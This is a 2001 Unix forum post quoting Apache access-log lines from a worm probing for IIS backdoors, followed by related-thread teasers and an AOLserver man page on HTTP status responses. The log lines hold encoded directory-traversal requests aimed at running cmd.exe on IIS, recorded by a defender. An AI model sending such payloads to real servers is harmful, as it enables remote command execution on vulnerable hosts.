Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: /var/log/httpd/access_log
Special Forums Cybersecurity /var/log/httpd/access_log Post 7760 by eddie on Monday 1st of October 2001 06:41:42 PM
Old 10-01-2001
Computer /var/log/httpd/access_log
Yesterday I happened to check /var/log/httpd/access_log and found some funny things like these,

209.127.62.159 - - [30/Sep/2001:21:23:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
209.127.62.159 - - [30/Sep/2001:21:23:10 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:14 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265

Obviously, the access treated my machine like NT/IIS. As we can see from the log, it was trying harder and harder. If I had not shut down port 80, it would have created hundreds of lines in the log file. I also checked the log of the past 3 months, there are about 200 tries of this kind from various ranges of IP address.

I think this is apparently virus attack. Has anybody here ever found such log? I just dial-up to the Internet and the connection lasted for about 30 minutes and I got this attack. I would keep my httpd closed. Thank god, my system is Linux, not NT.Smilie
Last edited by eddie; 10-01-2001 at 07:50 PM..
 

10 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

mail access_log

i am trying to figure a way to email my access_log twice a month to myself right before the system zeros it. using crontab is the way to go, but the command to get mail to do the job is my problem. #------------------------------------------- #0-59 0-23 1-31 1-12 0-6 (0=Sunday) #min hour... (3 Replies)
Discussion started by: dayglow
3 Replies

2. Solaris

diff b/w /var/log/syslog and /var/adm/messages

hi sirs can u tell the difference between /var/log/syslogs and /var/adm/messages in my working place i am having two servers. in one servers messages file is empty and syslog file is going on increasing.. and in another servers message file is going on increasing but syslog file is... (2 Replies)
Discussion started by: tv.praveenkumar
2 Replies

3. UNIX for Advanced & Expert Users

/var/adm/messages vs /var/log/messages

The /var/adm/messages in Solaris seem to log more system messages/errors compared to /var/log/messages in Linux. I checked the log level in Linux and they seem OK. Is there any other log file that contains the messages or is it just that Linux doesn't log great many things? (2 Replies)
Discussion started by: gomes1333
2 Replies

4. Emergency UNIX and Linux Support

/var/log/wtmp SuSE log permission rollback

Hello All, On my SuSE system, I have wtmp log this log file permission is 644 but every reboot the file permission rollback to 664. In the logrotate.conf and logrotate.d/wtmp files the wtmp logrotate set to 644. I would like to know, which "file" or "script" modify the wtmp log to rollback to... (7 Replies)
Discussion started by: kalaso
7 Replies

5. Solaris

Difference between /var/log/syslog and /var/adm/messages

Hi, Is the contents in /var/log/syslog and /var/adm/messages are same?? Regards (3 Replies)
Discussion started by: vks47
3 Replies

6. Shell Programming and Scripting

How can view log messages between two time frame from /var/log/message or any type of log files

How can view log messages between two time frame from /var/log/message or any type of log files. when logfiles are very big and especially many messages with in few minutes, I would like to display log messages between 5 minute interval. Could you pls give me the command? (1 Reply)
Discussion started by: johnveslin
1 Replies

7. HP-UX

Script to monitor /var/opt/resmon/log/event.log file

AM in need of some plugin/script that can monitor HP-UX file "/var/opt/resmon/log/event.log" . Have written a scrip in sh shell that is working fine for syslog.log and mail.log as having standard format, have interrogated that to Nagios and is working as I required . But same script failed to... (3 Replies)
Discussion started by: Shirishlnx
3 Replies

8. Shell Programming and Scripting

Access_log parsing and blocking ip

Hello, my website under http get attack. When i check the access_log i can see like this. xx.xxx.xxx.xxx - - "GET //wp-admin/blabla/test.php?jASHSSAsgaGSAgsASGIGIG HTTP/1.1" 200 0 "-" "-" xxx.xxx.x.xx - - "GET //wp-admin/blabla/test.php?jASHSSAsgaGSAgsASGIGIG HTTP/1.1" 200 0 "-" "-" ... (3 Replies)
Discussion started by: SAYGIN
3 Replies

9. Shell Programming and Scripting

Log all the commands input by user at real time in /var/log/messages

Below is my script to log all the command input by any user to /var/log/messages. But I cant achieve the desired output that i want. PLease see below. function log2syslog { declare COMMAND COMMAND=$(fc -ln -0) logger -p local1.notice -t bash -i -- "$USER:$COMMAND" } trap... (12 Replies)
Discussion started by: invinzin21
12 Replies

10. Shell Programming and Scripting

Transfer the logs being thrown into /var/log/messages into another file example /var/log/volumelog

I have been searching and reading about syslog. I would like to know how to Transfer the logs being thrown into /var/log/messages into another file example /var/log/volumelog. tail -f /var/log/messages dblogger: msg_to_dbrow: no logtype using missing dblogger: msg_to_dbrow_str: val ==... (2 Replies)
Discussion started by: kenshinhimura
2 Replies

LEARN ABOUT DEBIAN

ns_connreturnbadrequest

Ns_ConnReturnStatus(3aolserver) 			   AOLserver Library Procedures 			   Ns_ConnReturnStatus(3aolserver)

__________________________________________________________________________________________________________________________________________________

NAME

       Ns_ConnReturnBadRequest, Ns_ConnReturnForbidden, Ns_ConnReturnInternalError, Ns_ConnReturnNoResponse, Ns_ConnReturnNotFound, Ns_ConnReturn-
       NotImplemented, Ns_ConnReturnNotModified, Ns_ConnReturnOk, Ns_ConnReturnStatus, Ns_ConnReturnUnauthorized, Ns_RegisterRedirect  -  Routines
       to return simple standard responses

SYNOPSIS

       #include "ns.h"

       int
       Ns_ConnReturnBadRequest(conn, msg)

       int
       Ns_ConnReturnForbidden(conn)

       int
       Ns_ConnReturnInternalError(conn)

       int
       Ns_ConnReturnNoResponse(conn)

       int
       Ns_ConnReturnNotFound(conn)

       int
       Ns_ConnReturnNotImplemented(conn)

       int
       Ns_ConnReturnNotModified(conn)

       int
       Ns_ConnReturnOk(conn)

       int
       Ns_ConnReturnStatus(conn, status)

       int
       Ns_ConnReturnUnauthorized(conn)

       void
       Ns_RegisterRedirect(server, status, url)

ARGUMENTS

       Ns_Conn	 conn	(in)	  Pointer to open connection.

       char	 *msg	(in)	  String with additional message text.

       int	 status (in)	  Integer HTTP status code.

       char	 *url	(in)	  String which specifies internal redirection url.

       char	 *server(in)	  Virtual server.
_________________________________________________________________

DESCRIPTION

       These  routines are used to generate complete responses, including headers, approriate status codes, content types, and possibly short HTML
       content messages for the most common HTTP error or status responses.  They each coorespond to a particular HTTP status code,  for  example,
       Ns_ConnReturnNotFound  generates an HTTP 404 "Not Found" response.  They all return NS_OK if the response was sent or NS_ERROR if an under-
       lying routine failed.

       The default behavior is to return an internal, server generated response possibly with a short English language message, for  example  "The
       requested  URL  cannot be accessed by this server".  This behavior can be modified by calling the Ns_RegisterRedirect to redirect responses
       internally for the cooresponding HTTP status code to another URL on the server.	The "redirects" server config section can be used  to  map
       these redirects at startup

       int Ns_ConnReturnBadRequest(conn, msg)
	      Returns  an  HTTP 400 response with the short HTML message "Invalid Request: The HTTP request presented by your browser is invalid."
	      The optional msg string, if present, is also included in the message body.

       int Ns_ConnReturnForbidden(conn)
	      Returns an HTTP 403 response with the short HTML message "Forbidden: The requested URL cannot be accessed by this server."

       int Ns_ConnReturnInternalError(conn)
	      Returns an HTTP 500 response with the short HTML message "Server Error: The requested URL cannot be accessed due to a  system  error
	      on this server."

       int Ns_ConnReturnNoResponse(conn)
	      Equivalent to Ns_ConnReturnStatus(conn, 204).

       int Ns_ConnReturnNotFound(conn)
	      Returns an HTTP 404 response with the short HTML message "Not Found: The requested URL was not found on this server."

       int Ns_ConnReturnNotImplemented(conn)
	      Returns  an  HTTP  404 response with the short HTML message "Not Implemented: The requested URL or method is not implemented by this
	      server."

       int Ns_ConnReturnNotModified(conn)
	      Equivalent to Ns_ConnReturnStatus(conn, 304).

       int Ns_ConnReturnOk(conn)
	      Equivalent to Ns_ConnReturnStatus(conn, 200).

       int Ns_ConnReturnStatus(conn, status)
	      Generates a response with the given HTTP status with no content.

       int Ns_ConnReturnUnauthorized(conn)
	      Returns an HTTP 401 response with the short HTML message "Access Denied: The requested URL cannot be accessed because a valid  user-
	      name and password are required."	As "WWW-Authenticate: Basic realm=server realm" header is also included in the response.

       void Ns_RegisterRedirect(server, status, url)
	      Redirect	the  above  responses from the given server for the given status code from the simple internal messages described above to
	      the given internal url. The redirect is performed using Ns_ConnRedirect.

SEE ALSO

       Ns_ConnFlush(3), Ns_ConnRedirect(3), Ns_ConnSetRequiredHeaders(3), Ns_ConnQueueHeaders(3), ns_return(n)

KEYWORDS

       connnection, response

AOLserver								4.0					   Ns_ConnReturnStatus(3aolserver)
All times are GMT -4. The time now is 11:07 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy